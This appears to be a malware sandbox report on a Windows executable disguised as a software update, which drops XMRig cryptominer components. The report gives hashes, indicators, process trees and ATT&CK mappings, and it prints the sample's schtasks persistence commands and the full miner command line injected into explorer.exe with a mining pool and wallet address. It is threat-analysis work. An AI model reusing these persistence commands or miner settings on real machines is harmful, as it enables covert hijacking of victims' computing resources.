xmrig | b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae

Analysis

max time kernel
137s
max time network
129s
platform
windows10_x64
resource
win10v20210408
submitted
19-07-2021 00:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Software updated v2.6.0.exe
Size

256KB
MD5

18d05e20731583a22b495d0d1f107c5b
SHA1

2ced0e3577063ca3613b43661e7df5bc1411ab09
SHA256

b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae
SHA512

36e73454b0d74088fb39dbec77c45c4106908dc80efc6a0ac8247a538345b4224f3f5e0cf6b39cf8c1687ddcee58ac2e6f24b735c9b9e277c7d064fd82e7a65a

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/2112-166-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/2112-167-0x00000001402EB66C-mapping.dmp	xmrig
behavioral2/memory/2112-169-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Executes dropped EXE 6 IoCs

Processes:

xmrmine.exeetcmin.exertksmbs.exeserverpatch.exesihost64.exesihost32.exe

pid process

3860 xmrmine.exe
3928 etcmin.exe
3884 rtksmbs.exe
4028 serverpatch.exe
3472 sihost64.exe
3356 sihost32.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

serverpatch.exe

description pid process target process

PID 4028 set thread context of 2112 4028 serverpatch.exe explorer.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2688 schtasks.exe
3544 schtasks.exe
688 schtasks.exe
4076 schtasks.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

etcmin.exexmrmine.exeserverpatch.exertksmbs.exe

pid process

3928 etcmin.exe
3860 xmrmine.exe
4028 serverpatch.exe
3884 rtksmbs.exe

pid	process
3860	xmrmine.exe
3928	etcmin.exe
3884	rtksmbs.exe
4028	serverpatch.exe
3472	sihost64.exe
3356	sihost32.exe

description	pid	process	target process
PID 4028 set thread context of 2112	4028	serverpatch.exe	explorer.exe

pid	process
2688	schtasks.exe
3544	schtasks.exe
688	schtasks.exe
4076	schtasks.exe

pid	process
3928	etcmin.exe
3860	xmrmine.exe
4028	serverpatch.exe
3884	rtksmbs.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

xmrmine.exeetcmin.exeserverpatch.exertksmbs.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	3860	xmrmine.exe
Token: SeDebugPrivilege	3928	etcmin.exe
Token: SeDebugPrivilege	4028	serverpatch.exe
Token: SeDebugPrivilege	3884	rtksmbs.exe
Token: SeLockMemoryPrivilege	2112	explorer.exe
Token: SeLockMemoryPrivilege	2112	explorer.exe

Suspicious use of WriteProcessMemory 43 IoCs

Processes:

Software updated v2.6.0.exexmrmine.exeetcmin.execmd.execmd.exeserverpatch.exertksmbs.execmd.execmd.exe

description	pid	process	target process
PID 992 wrote to memory of 3860	992	Software updated v2.6.0.exe	xmrmine.exe
PID 992 wrote to memory of 3860	992	Software updated v2.6.0.exe	xmrmine.exe
PID 992 wrote to memory of 3928	992	Software updated v2.6.0.exe	etcmin.exe
PID 992 wrote to memory of 3928	992	Software updated v2.6.0.exe	etcmin.exe
PID 3860 wrote to memory of 2052	3860	xmrmine.exe	cmd.exe
PID 3860 wrote to memory of 2052	3860	xmrmine.exe	cmd.exe
PID 3928 wrote to memory of 576	3928	etcmin.exe	cmd.exe
PID 3928 wrote to memory of 576	3928	etcmin.exe	cmd.exe
PID 2052 wrote to memory of 4076	2052	cmd.exe	schtasks.exe
PID 2052 wrote to memory of 4076	2052	cmd.exe	schtasks.exe
PID 576 wrote to memory of 2688	576	cmd.exe	schtasks.exe
PID 576 wrote to memory of 2688	576	cmd.exe	schtasks.exe
PID 3860 wrote to memory of 4028	3860	xmrmine.exe	serverpatch.exe
PID 3860 wrote to memory of 4028	3860	xmrmine.exe	serverpatch.exe
PID 3928 wrote to memory of 3884	3928	etcmin.exe	rtksmbs.exe
PID 3928 wrote to memory of 3884	3928	etcmin.exe	rtksmbs.exe
PID 4028 wrote to memory of 2164	4028	serverpatch.exe	cmd.exe
PID 4028 wrote to memory of 2164	4028	serverpatch.exe	cmd.exe
PID 3884 wrote to memory of 1532	3884	rtksmbs.exe	cmd.exe
PID 3884 wrote to memory of 1532	3884	rtksmbs.exe	cmd.exe
PID 4028 wrote to memory of 3472	4028	serverpatch.exe	sihost64.exe
PID 4028 wrote to memory of 3472	4028	serverpatch.exe	sihost64.exe
PID 3884 wrote to memory of 3356	3884	rtksmbs.exe	sihost32.exe
PID 3884 wrote to memory of 3356	3884	rtksmbs.exe	sihost32.exe
PID 2164 wrote to memory of 688	2164	cmd.exe	schtasks.exe
PID 2164 wrote to memory of 688	2164	cmd.exe	schtasks.exe
PID 1532 wrote to memory of 3544	1532	cmd.exe	schtasks.exe
PID 1532 wrote to memory of 3544	1532	cmd.exe	schtasks.exe
PID 4028 wrote to memory of 2112	4028	serverpatch.exe	explorer.exe
PID 4028 wrote to memory of 2112	4028	serverpatch.exe	explorer.exe
PID 4028 wrote to memory of 2112	4028	serverpatch.exe	explorer.exe
PID 4028 wrote to memory of 2112	4028	serverpatch.exe	explorer.exe
PID 4028 wrote to memory of 2112	4028	serverpatch.exe	explorer.exe
PID 4028 wrote to memory of 2112	4028	serverpatch.exe	explorer.exe
PID 4028 wrote to memory of 2112	4028	serverpatch.exe	explorer.exe
PID 4028 wrote to memory of 2112	4028	serverpatch.exe	explorer.exe
PID 4028 wrote to memory of 2112	4028	serverpatch.exe	explorer.exe
PID 4028 wrote to memory of 2112	4028	serverpatch.exe	explorer.exe
PID 4028 wrote to memory of 2112	4028	serverpatch.exe	explorer.exe
PID 4028 wrote to memory of 2112	4028	serverpatch.exe	explorer.exe
PID 4028 wrote to memory of 2112	4028	serverpatch.exe	explorer.exe
PID 4028 wrote to memory of 2112	4028	serverpatch.exe	explorer.exe
PID 4028 wrote to memory of 2112	4028	serverpatch.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0.exe
"C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:992

C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\xmrmine.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3860

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:2052

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
4⤵
- Creates scheduled task(s)
PID:4076

C:\Users\Admin\appdata\roaming\serverpatch.exe
"C:\Users\Admin\appdata\roaming\serverpatch.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4028

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:2164

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
5⤵
- Creates scheduled task(s)
PID:688

C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
"C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"
4⤵
- Executes dropped EXE
PID:3472

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2112

C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3928

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:576

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
4⤵
- Creates scheduled task(s)
PID:2688

C:\Users\Admin\appdata\roaming\rtksmbs.exe
"C:\Users\Admin\appdata\roaming\rtksmbs.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3884

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:1532

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
5⤵
- Creates scheduled task(s)
PID:3544

C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
"C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"
4⤵
- Executes dropped EXE
PID:3356

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\libs\sihost64.exe
MD5
f20a5085dbb85927b25ed46a45fe0a13

SHA1
41b351e45a7be1d6c6c6918ee65b00f5d69ff787

SHA256
370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235

SHA512
4cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost32.exe
MD5
e149663730c0b03c8936baffe9645bb4

SHA1
c0fb146c35d48481df4149027953e4ab7be59e95

SHA256
33225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469

SHA512
553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe

Download Submit
C:\Users\Admin\AppData\Roaming\etcmin.exe
MD5
406f2550d0d4b9b3e2f47994076e8b8b

SHA1
01ab414c9d14ef6a10cd1f3c815e2d63ace18822

SHA256
4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

SHA512
73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

Download Submit
C:\Users\Admin\AppData\Roaming\etcmin.exe
MD5
406f2550d0d4b9b3e2f47994076e8b8b

SHA1
01ab414c9d14ef6a10cd1f3c815e2d63ace18822

SHA256
4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

SHA512
73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

Download Submit
C:\Users\Admin\AppData\Roaming\rtksmbs.exe
MD5
406f2550d0d4b9b3e2f47994076e8b8b

SHA1
01ab414c9d14ef6a10cd1f3c815e2d63ace18822

SHA256
4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

SHA512
73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

Download Submit
C:\Users\Admin\AppData\Roaming\serverpatch.exe
MD5
973037113a1f50e0ca79d3cc42a5ef66

SHA1
78235c164ebfa47d613a100abf5c64bed10c1036

SHA256
a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

SHA512
d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

Download Submit
C:\Users\Admin\AppData\Roaming\xmrmine.exe
MD5
973037113a1f50e0ca79d3cc42a5ef66

SHA1
78235c164ebfa47d613a100abf5c64bed10c1036

SHA256
a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

SHA512
d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

Download Submit
C:\Users\Admin\AppData\Roaming\xmrmine.exe
MD5
973037113a1f50e0ca79d3cc42a5ef66

SHA1
78235c164ebfa47d613a100abf5c64bed10c1036

SHA256
a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

SHA512
d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

Download Submit
C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
MD5
f20a5085dbb85927b25ed46a45fe0a13

SHA1
41b351e45a7be1d6c6c6918ee65b00f5d69ff787

SHA256
370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235

SHA512
4cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f

Download Submit
C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
MD5
e149663730c0b03c8936baffe9645bb4

SHA1
c0fb146c35d48481df4149027953e4ab7be59e95

SHA256
33225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469

SHA512
553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe

Download Submit
C:\Users\Admin\appdata\roaming\rtksmbs.exe
MD5
406f2550d0d4b9b3e2f47994076e8b8b

SHA1
01ab414c9d14ef6a10cd1f3c815e2d63ace18822

SHA256
4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

SHA512
73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

Download Submit
C:\Users\Admin\appdata\roaming\serverpatch.exe
MD5
973037113a1f50e0ca79d3cc42a5ef66

SHA1
78235c164ebfa47d613a100abf5c64bed10c1036

SHA256
a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

SHA512
d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

Download Submit
memory/576-129-0x0000000000000000-mapping.dmp

Download
memory/688-164-0x0000000000000000-mapping.dmp

Download
memory/1532-149-0x0000000000000000-mapping.dmp

Download
memory/2052-128-0x0000000000000000-mapping.dmp

Download
memory/2112-173-0x0000000014C40000-0x0000000014C60000-memory.dmp

Filesize
128KB

Download
memory/2112-172-0x0000000014790000-0x00000000147B0000-memory.dmp

Filesize
128KB

Download
memory/2112-169-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/2112-168-0x0000000001340000-0x0000000001360000-memory.dmp

Filesize
128KB

Download
memory/2112-167-0x00000001402EB66C-mapping.dmp

Download
memory/2112-166-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/2112-174-0x00000000149B0000-0x00000000149D0000-memory.dmp

Filesize
128KB

Download
memory/2112-175-0x00000000149D0000-0x00000000149F0000-memory.dmp

Filesize
128KB

Download
memory/2164-148-0x0000000000000000-mapping.dmp

Download
memory/2688-131-0x0000000000000000-mapping.dmp

Download
memory/3356-151-0x0000000000000000-mapping.dmp

Download
memory/3356-163-0x000000001BA60000-0x000000001BA62000-memory.dmp

Filesize
8KB

Download
memory/3356-158-0x0000000000030000-0x0000000000031000-memory.dmp

Filesize
4KB

Download
memory/3472-162-0x000000001C310000-0x000000001C312000-memory.dmp

Filesize
8KB

Download
memory/3472-150-0x0000000000000000-mapping.dmp

Download
memory/3472-154-0x00000000006F0000-0x00000000006F1000-memory.dmp

Filesize
4KB

Download
memory/3544-165-0x0000000000000000-mapping.dmp

Download
memory/3860-118-0x0000000000080000-0x0000000000081000-memory.dmp

Filesize
4KB

Download
memory/3860-132-0x000000001C350000-0x000000001C352000-memory.dmp

Filesize
8KB

Download
memory/3860-125-0x00000000009A0000-0x00000000009A9000-memory.dmp

Filesize
36KB

Download
memory/3860-114-0x0000000000000000-mapping.dmp

Download
memory/3884-160-0x000000001C4B0000-0x000000001C4B2000-memory.dmp

Filesize
8KB

Download
memory/3884-135-0x0000000000000000-mapping.dmp

Download
memory/3928-126-0x00000000011A0000-0x00000000011A1000-memory.dmp

Filesize
4KB

Download
memory/3928-124-0x00000000010E0000-0x00000000010E6000-memory.dmp

Filesize
24KB

Download
memory/3928-122-0x00000000007C0000-0x00000000007C1000-memory.dmp

Filesize
4KB

Download
memory/3928-117-0x0000000000000000-mapping.dmp

Download
memory/3928-133-0x00000000011D0000-0x00000000011D2000-memory.dmp

Filesize
8KB

Download
memory/4028-134-0x0000000000000000-mapping.dmp

Download
memory/4028-161-0x000000001D3A0000-0x000000001D3A2000-memory.dmp

Filesize
8KB

Download
memory/4076-130-0x0000000000000000-mapping.dmp

Download